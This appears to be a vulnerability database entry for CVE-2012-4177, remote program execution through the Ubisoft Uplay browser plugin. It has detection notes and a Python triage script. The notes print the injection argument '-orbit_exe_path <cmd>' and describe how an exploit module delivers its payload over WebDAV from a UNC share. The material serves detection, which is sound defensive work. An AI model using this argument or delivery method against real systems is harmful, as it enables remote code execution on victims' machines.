CVE-2012-4177
published 2012-08-07

CVE-2012-4177: The web browser plugin for Ubisoft Uplay PC before 2.0.4 allows remote attackers to execute arbitrary programs via the -orbit_exe_path command line argument.

Priority P2 · 74 · critical · CVSS 2.0 score 10
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 58.02% (99.0th percentile)

Affected (4 ranges)

Vendor | Product  | Version range | Fixed in
ubi    | uplay_pc | <= 2.0.3      |
ubi    | uplay_pc |               |
ubi    | uplay_pc |               |
ubi    | uplay_pc |               |

Detection & IOCs

command: `-orbit_product_id 1 -orbit_exe_path <cmd> -uplay_steam_mode -uplay_dev_mode -uplay_dev_mode_auto_play`
command: `-orbit_exe_path`
  • Detect ActiveX instantiation of the Ubisoft uplay ActiveX component (classid) within a browser context, particularly when the `open()` method is called with `-orbit_exe_path` in its argument string.
  • The exploit targets only Windows XP SP3 (NT 5.1) user agents; filter for exploitation attempts scoped to this UA string.
  • The exploit serves the malicious payload via WebDAV over port 80; monitor for WebDAV PROPFIND/OPTIONS requests on port 80 originating from browser processes, especially followed by UNC path access (\\<host>\<share>\<random8>.exe).
  • Look for processes spawned by the uplay browser plugin with command-line arguments containing `-orbit_exe_path` pointing to a UNC path.
  • The Metasploit module enforces SRVPORT=80 and URIPATH=/ and will fail otherwise; detections scoped to port 80 WebDAV are appropriate for this exploit as delivered.
  • Exploitation requires the victim user to be signed into uplay (or have auto-sign-in enabled) and uplay must not already be running at the time of the attack.
  • The exploit only engages Windows XP SP3 targets (NT 5.1 UA check); other OS versions will receive a 404 and not be exploited by this module.
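
The process command-line check from the list above, written out as an added example (not code from this page or from any vendor tool): it flags process-creation events whose `-orbit_exe_path` value is a UNC path and marks any other use of the flag for review. The event field names, `launcher.exe`, the hosts and the paths are constructed placeholders, and the base64 fallback is an assumption added here in case the value is logged encoded.

```python
import base64
import re

# Value after -orbit_exe_path: a quoted string or a run of non-space characters.
ORBIT_ARG = re.compile(r'-orbit_exe_path\s+(?:"([^"]*)"|(\S+))', re.IGNORECASE)
# UNC path: two leading separators, a host, a separator, a share name.
UNC = re.compile(r'^[\\/]{2}[^\\/]+[\\/][^\\/]+')


def candidates(value):
    """Return the raw value plus, when it is valid base64, its decoded form."""
    out = [value]
    try:
        # Assumption added here: the path may be logged base64-encoded.
        out.append(base64.b64decode(value, validate=True).decode("latin-1"))
    except ValueError:  # binascii.Error is a ValueError subclass
        pass
    return out


def classify(command_line):
    """'unc' if the flag points at a remote share, 'other' if present, None if absent."""
    m = ORBIT_ARG.search(command_line)
    if m is None:
        return None
    value = m.group(1) if m.group(1) is not None else m.group(2)
    return "unc" if any(UNC.match(c) for c in candidates(value)) else "other"


def triage(events):
    """Return (severity, host) for each process-creation event carrying the flag."""
    severity = {"unc": "high", "other": "review"}
    hits = []
    for ev in events:
        verdict = classify(ev["command_line"])
        if verdict is not None:
            hits.append((severity[verdict], ev["host"]))
    return hits


# Constructed sample events: hosts, launcher.exe and paths are placeholders.
_ENCODED = base64.b64encode(rb"\\192.0.2.10\share\abcdefgh.exe").decode()
SAMPLE_EVENTS = [
    {"host": "ws-01", "command_line": r"launcher.exe -orbit_product_id 1 "
                                      r"-orbit_exe_path \\192.0.2.10\share\abcdefgh.exe"},
    {"host": "ws-02", "command_line": "launcher.exe -orbit_exe_path " + _ENCODED},
    {"host": "ws-03", "command_line": r'launcher.exe -orbit_exe_path "C:\Games\game.exe"'},
    {"host": "ws-04", "command_line": "launcher.exe -uplay_steam_mode"},
]
```

Feed `triage()` the process-creation records from your own EDR or Sysmon export, mapping their fields to `host` and `command_line`.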